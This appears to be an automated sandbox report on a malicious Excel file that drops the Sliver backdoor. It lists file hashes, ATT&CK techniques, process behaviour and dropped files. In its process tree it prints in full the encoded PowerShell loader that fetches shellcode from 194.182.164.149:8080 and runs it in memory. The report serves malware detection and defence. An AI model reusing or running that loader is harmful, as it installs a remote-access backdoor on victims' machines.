sliver | e958c7960d354a86b54b72064200d3dce489f588147d86ed7c7e9a6252c6ea0a

General

Target

e958c7960d354a86b54b72064200d3dce489f588147d86ed7c7e9a6252c6ea0a.xls
Size

46KB
MD5

058a72e7a27017cac0d87d2181737e5c
SHA1

ac057c406c374ff8eae0184852ef739ed54728e5
SHA256

e958c7960d354a86b54b72064200d3dce489f588147d86ed7c7e9a6252c6ea0a
SHA512

056e3ed6698e2d7549d7203ab82c4e6f1675010de812446de611010d24d8d4b3e78f3ec522c96917bd36c77eeacb495ccfd8a4a1c154db5e1e163efb75b5c1ca
SSDEEP

768:o4SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:jSFsv66g3KnF439NKC54kkGfn+cL2Xd+

Score

10^/10

sliver backdoor discovery execution trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://194.182.164.149:8080/fontawesome.woff

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exe

description	pid	pid_target	Process	procid_target
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	3024	1232	powershell.exe	29

Sliver RAT v2 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/3024-45-0x0000000006450000-0x0000000006ECE000-memory.dmp	SliverRAT_v2

Sliver family
sliver
SliverRAT
SliverRAT is an open source Adversary Emulation Framework.
trojan backdoor sliver

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow	pid	Process
4	3024	powershell.exe
6	3024	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

Processes:

powershell.exe

pid	Process
3024	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

EXCEL.EXEpowershell.execsc.execvtres.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid	Process
1232	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid	Process
3024	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description	pid	Process
Token: SeDebugPrivilege	3024	powershell.exe

Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

EXCEL.EXE

pid	Process
1232	EXCEL.EXE
1232	EXCEL.EXE
1232	EXCEL.EXE

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

EXCEL.EXEpowershell.execsc.exe

description	pid	Process	procid_target
PID 1232 wrote to memory of 3024	1232	EXCEL.EXE	30
PID 1232 wrote to memory of 3024	1232	EXCEL.EXE	30
PID 1232 wrote to memory of 3024	1232	EXCEL.EXE	30
PID 1232 wrote to memory of 3024	1232	EXCEL.EXE	30
PID 3024 wrote to memory of 2928	3024	powershell.exe	32
PID 3024 wrote to memory of 2928	3024	powershell.exe	32
PID 3024 wrote to memory of 2928	3024	powershell.exe	32
PID 3024 wrote to memory of 2928	3024	powershell.exe	32
PID 2928 wrote to memory of 2764	2928	csc.exe	33
PID 2928 wrote to memory of 2764	2928	csc.exe	33
PID 2928 wrote to memory of 2764	2928	csc.exe	33
PID 2928 wrote to memory of 2764	2928	csc.exe	33

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\e958c7960d354a86b54b72064200d3dce489f588147d86ed7c7e9a6252c6ea0a.xls
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1232
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3024
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vem0rcwv.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2928
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA64E.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCA63E.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2764

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\CabB4B1.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESA64E.tmp

Filesize
1KB

MD5
272bdf90517c70452f084b619d7ff067

SHA1
c2542537f240b46e9da1fcdf80d35c209874c1b0

SHA256
6694d28ecdb5d0568718763390ecad3f4108beb82de01cb1f935b0f218c0018a

SHA512
b7f2e52636983e9c6cf797efbc9fa4303337eefa2ade875f555c3c804cfc29b20e4b8ed0cdda39b900f9f71e8cd4336acc372073aa7a35516a87c6f91eb0c4a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\vem0rcwv.dll

Filesize
3KB

MD5
6a962749d78dff6d1bc07bae89b3fc58

SHA1
469c6dab4678bf73b6c206e921919a3f6831e893

SHA256
61077314f0f1dd217c167dcbe1c0b26c5dc16fa63ebdf92d56abeaa676862be1

SHA512
332bde4e0fa2f434d25995b180efff4f29eb949137a85f44f0888a8cf70ecc3b84c41f6edc60cacab548e493293e0e0de042f5766ad145abca930f8939cd008c

Download Submit
C:\Users\Admin\AppData\Local\Temp\vem0rcwv.pdb

Filesize
7KB

MD5
1f74a6800ee5f0402aa00855b9c34775

SHA1
95f17b52740f12218990046f929d5d234699c47b

SHA256
51c106fa2addace87e226ad404376fc95b02de40ad10ac3cc5a3ca7042ad6c98

SHA512
0f2142de3818908cd9cc7fb8d0a188da0a8786543d90217b9302d1f91606c9983d3aabbd2638e6cb7b9c20a2f8e5eebbcfbb36d10112451dd54d46ff9eca4ef7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCA63E.tmp

Filesize
652B

MD5
e9c33882cfdf250dc10831208c0d7b63

SHA1
0c2f4bb6fa78189abfb42a708552e17c62051c77

SHA256
7dff3df4a19b71779b9104f43018cfa452bdb45d2ac8967d00a8d6ce846ab448

SHA512
4e222bf4b191e0dc94cba4eb846dd541057bde8919de47fbff68fa325c6af086bd4cf2204fc462b8283849741ab0875e18ec79b2aa1706c67cc26974def211e0

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\vem0rcwv.0.cs

Filesize
631B

MD5
f4dd5c682eb7b3b679f084261bfc7c4c

SHA1
70f75d7a4e42c185eb09139ed3c6f7338a2219c2

SHA256
2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319

SHA512
8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\vem0rcwv.cmdline

Filesize
309B

MD5
b9a32cf71784dd999c25d8bc6deb2eaf

SHA1
b5a2cc79c07ff993c6926aaba8a2ef6f460c5860

SHA256
063c14137a22b24816a21a962afed5194cdecd3137599f25144993b5cf83eb2c

SHA512
a815736a82cb5b3da7627e49de6aecec8afd243f85f000b92811feec890e9d02c5033c1f68417ad9b8df65843636ab53d35c240929cb1e5d5e6c6aae6cff3c30

Download Submit
memory/1232-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1232-8-0x0000000006A30000-0x0000000006B30000-memory.dmp

Filesize
1024KB

Download
memory/1232-9-0x0000000006A30000-0x0000000006B30000-memory.dmp

Filesize
1024KB

Download
memory/1232-1-0x0000000072C3D000-0x0000000072C48000-memory.dmp

Filesize
44KB

Download
memory/1232-43-0x0000000072C3D000-0x0000000072C48000-memory.dmp

Filesize
44KB

Download
memory/1232-44-0x0000000006A30000-0x0000000006B30000-memory.dmp

Filesize
1024KB

Download
memory/3024-45-0x0000000006450000-0x0000000006ECE000-memory.dmp

Filesize
10.5MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads